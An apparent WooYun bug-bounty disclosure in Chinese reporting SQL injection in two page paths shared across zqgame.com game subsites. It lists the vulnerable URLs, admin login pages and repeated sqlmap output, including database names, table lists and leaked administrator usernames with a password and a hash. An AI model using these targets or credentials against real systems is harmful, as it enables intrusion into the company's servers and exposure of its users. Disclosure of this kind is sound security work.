漏洞概要 关注数(24) 关注此漏洞
缺陷编号:wooyun-2013-027663
漏洞标题:游戏服务商-中青宝网在线通杀漏洞 涉及几百万游戏用户哦
相关厂商:zqgame.com
漏洞作者: 爱上平顶山
提交时间:2013-07-04 08:09
修复时间:2013-10-02 08:09
公开时间:2013-10-02 08:09
漏洞类型:SQL注射漏洞
危害等级:高
自评Rank:18
漏洞状态:未联系到厂商或者厂商积极忽略
漏洞来源: http://www.wooyun.org,如有疑问或需要帮助请联系 [email protected]
Tags标签: 无
漏洞详情
披露状态:
2013-07-04: 积极联系厂商并且等待厂商认领中,细节不对外公开
2013-10-02: 厂商已经主动忽略漏洞,细节向公众公开
简要描述:
RT..
详细说明:
游戏服务商-中青宝网在线通杀漏洞
为何叫通杀? 只要是中青宝网在线 的游戏分站 只要有
Main/ListPage.aspx?type=news 或者Main/Tutorial.aspx?type=actmess这两个页面 都存在SQL诸如漏洞
http://zgqxbk.zqgame.com/Main/ListPage.aspx?type=news 存在sql注入漏洞
http://zgqx.zqgame.com/Main/Tutorial.aspx?type=actmess 存在sql注入漏洞
不多说:
一些后台:
https://iaas.zqgame.com/
http://ty.zqgame.com/login.aspx
http://kf.zqgame.com/admin/adminLogin.do
然后 SQLMAP :
available databases [39]:
[*] Activity_bw_shipin
[*] bwgamedb0419
[*] bwsmDataTable
[*] db_Activity
[*] enterprise_stie
[*] GameActivity
[*] Help
[*] helpdb
[*] hydb
[*] jwdb
[*] jwgamedb
[*] kangzhandb
[*] kzwzgamedb
[*] Lecture
[*] Lj2gamedb
[*] Ljgamedb
[*] ltgamedb
[*] master
[*] mhshDB
[*] mhshGH
[*] model
[*] Monitoring
[*] msdb
[*] NewxyGame
[*] nh_gamedb
[*] pdgwdb
[*] qqgamedb
[*] sd_ljdb
[*] sggamedb
[*] tempdb
[*] ttttt
[*] XwActivedb
[*] XWgame
[*] XWGhdb
[*] xygameDB
[*] zbxgamedb
[*] zgqxdb
[*] zgwzdb
[*] zq_ads
-------------------------------------------------------------------------------------------
[22:53:06] [INFO] fetching current database
current database: ''
database management system users [2]:
[*] sa
[*] zgqx_login_db
居然还有SA。。
[22:54:49] [INFO] fetching current user
current user: 'zgqx_login_db'
Database: zgqxdb
[49 tables]
+---------------------------+
| dbo.BBS0525 |
| dbo.BBS052test |
| dbo.Calendar0515 |
| dbo.ClientDown |
| dbo.D99_Tmp |
| dbo.IndexLink |
| dbo.MediaActivities |
| dbo.OfferqqCode20090703 |
| dbo.answer |
| dbo.apply_20090605 |
| dbo.dtproperties |
| dbo.gamecode |
| dbo.gamecode0420 |
| dbo.ghtable0511 |
| dbo.hdperson0525 |
| dbo.ipaddress0420 |
| dbo.kz_Article |
| dbo.kz_ArticleType |
| dbo.kz_GameAction |
| dbo.kz_GameActionTime |
| dbo.kz_GameActionType |
| dbo.kz_GameHero |
| dbo.kz_LinkedPic |
| dbo.kz_LinkedPicType |
| dbo.kz_Manager |
| dbo.kz_MessageBoard |
| dbo.kz_OperationLog |
| dbo.kz_PageTemplate |
| dbo.kz_Picture |
| dbo.kz_PictureType |
| dbo.kz_Role |
| dbo.kz_UserInRole |
| dbo.kz_Vote |
| dbo.kz_VoteLog |
| dbo.offerorder_20091012 |
| dbo.offerqq20091012 |
| dbo.patch |
| dbo.pt_PlayerSerial |
| dbo.qqcode20090703 |
| dbo.qqzuan20090720 |
| dbo.site |
| dbo.sysc |
| dbo.syscommand |
| dbo.tc_num |
| dbo.voteinfo0525 |
| dbo.winaccount0420 |
| dbo.zgqx_img_2011_11_03 |
| dbo.zgqx_info_2011_11_03 |
| dbo.zgqx_video_2011_11_03 |
+---------------------------+
Database: zgqxdb
Table: dbo.kz_Manager
[5 columns]
+------------+----------+
| Column | Type |
+------------+----------+
| createTime | datetime |
| ip | char |
| pwd | varchar |
| userId | varchar |
| userName | nvarchar |
+------------+----------+
Database: zgqxdb
Table: dbo.kz_Manager
[2 entries]
+----------+----------------------------------+----------+
| userId | pwd | userName |
+----------+----------------------------------+----------+
| zhanghua | 5152257 | zhanghua |
| admin | 9ccc21b7674b0fc274133ed66c40c196 | admin |
+----------+----------------------------------+----------+
能跑出来的 不止这些 比如:
Database: msdb
[20 tables]
+------------------------------------------------+
| dbo.backupfile |
| dbo.backupmediafamily |
| dbo.backupmediaset |
| dbo.backupset |
| dbo.logmarkhistory |
| dbo.restorefile |
| dbo.restorefilegroup |
| dbo.restorehistory |
| dbo.suspect_pages |
| dbo.syspolicy_conditions |
| dbo.syspolicy_configuration |
| dbo.syspolicy_object_sets |
| dbo.syspolicy_policies |
| dbo.syspolicy_policy_categories |
| dbo.syspolicy_policy_category_subscriptions |
| dbo.syspolicy_policy_execution_history |
| dbo.syspolicy_policy_execution_history_details |
| dbo.syspolicy_system_health_state |
| dbo.syspolicy_target_set_levels |
| dbo.syspolicy_target_sets |
+------------------------------------------------+
ok了吧
漏洞证明:
available databases [39]:
[*] Activity_bw_shipin
[*] bwgamedb0419
[*] bwsmDataTable
[*] db_Activity
[*] enterprise_stie
[*] GameActivity
[*] Help
[*] helpdb
[*] hydb
[*] jwdb
[*] jwgamedb
[*] kangzhandb
[*] kzwzgamedb
[*] Lecture
[*] Lj2gamedb
[*] Ljgamedb
[*] ltgamedb
[*] master
[*] mhshDB
[*] mhshGH
[*] model
[*] Monitoring
[*] msdb
[*] NewxyGame
[*] nh_gamedb
[*] pdgwdb
[*] qqgamedb
[*] sd_ljdb
[*] sggamedb
[*] tempdb
[*] ttttt
[*] XwActivedb
[*] XWgame
[*] XWGhdb
[*] xygameDB
[*] zbxgamedb
[*] zgqxdb
[*] zgwzdb
[*] zq_ads
-------------------------------------------------------------------------------------------
[22:53:06] [INFO] fetching current database
current database: ''
database management system users [2]:
[*] sa
[*] zgqx_login_db
[22:54:49] [INFO] fetching current user
current user: 'zgqx_login_db'
Database: zgqxdb
[49 tables]
+---------------------------+
| dbo.BBS0525 |
| dbo.BBS052test |
| dbo.Calendar0515 |
| dbo.ClientDown |
| dbo.D99_Tmp |
| dbo.IndexLink |
| dbo.MediaActivities |
| dbo.OfferqqCode20090703 |
| dbo.answer |
| dbo.apply_20090605 |
| dbo.dtproperties |
| dbo.gamecode |
| dbo.gamecode0420 |
| dbo.ghtable0511 |
| dbo.hdperson0525 |
| dbo.ipaddress0420 |
| dbo.kz_Article |
| dbo.kz_ArticleType |
| dbo.kz_GameAction |
| dbo.kz_GameActionTime |
| dbo.kz_GameActionType |
| dbo.kz_GameHero |
| dbo.kz_LinkedPic |
| dbo.kz_LinkedPicType |
| dbo.kz_Manager |
| dbo.kz_MessageBoard |
| dbo.kz_OperationLog |
| dbo.kz_PageTemplate |
| dbo.kz_Picture |
| dbo.kz_PictureType |
| dbo.kz_Role |
| dbo.kz_UserInRole |
| dbo.kz_Vote |
| dbo.kz_VoteLog |
| dbo.offerorder_20091012 |
| dbo.offerqq20091012 |
| dbo.patch |
| dbo.pt_PlayerSerial |
| dbo.qqcode20090703 |
| dbo.qqzuan20090720 |
| dbo.site |
| dbo.sysc |
| dbo.syscommand |
| dbo.tc_num |
| dbo.voteinfo0525 |
| dbo.winaccount0420 |
| dbo.zgqx_img_2011_11_03 |
| dbo.zgqx_info_2011_11_03 |
| dbo.zgqx_video_2011_11_03 |
+---------------------------+
Database: zgqxdb
Table: dbo.kz_Manager
[5 columns]
+------------+----------+
| Column | Type |
+------------+----------+
| createTime | datetime |
| ip | char |
| pwd | varchar |
| userId | varchar |
| userName | nvarchar |
+------------+----------+
Database: zgqxdb
Table: dbo.kz_Manager
[2 entries]
+----------+----------------------------------+----------+
| userId | pwd | userName |
+----------+----------------------------------+----------+
| zhanghua | 5152257 | zhanghua |
| admin | 9ccc21b7674b0fc274133ed66c40c196 | admin |
+----------+----------------------------------+----------+
能跑出来的 不止这些 比如:
Database: msdb
[20 tables]
+------------------------------------------------+
| dbo.backupfile |
| dbo.backupmediafamily |
| dbo.backupmediaset |
| dbo.backupset |
| dbo.logmarkhistory |
| dbo.restorefile |
| dbo.restorefilegroup |
| dbo.restorehistory |
| dbo.suspect_pages |
| dbo.syspolicy_conditions |
| dbo.syspolicy_configuration |
| dbo.syspolicy_object_sets |
| dbo.syspolicy_policies |
| dbo.syspolicy_policy_categories |
| dbo.syspolicy_policy_category_subscriptions |
| dbo.syspolicy_policy_execution_history |
| dbo.syspolicy_policy_execution_history_details |
| dbo.syspolicy_system_health_state |
| dbo.syspolicy_target_set_levels |
| dbo.syspolicy_target_sets |
+------------------------------------------------+
不放多了 游戏用户账号密码就不跑了 我不是脱裤的 。 你懂得。
修复方案:
你懂得。 求礼物 求大礼包、~ 这个应该有吧? 怎么说也几百万用户啊。。
版权声明:转载请注明来源 爱上平顶山@乌云
漏洞回应
厂商回应:
未能联系到厂商或者厂商积极拒绝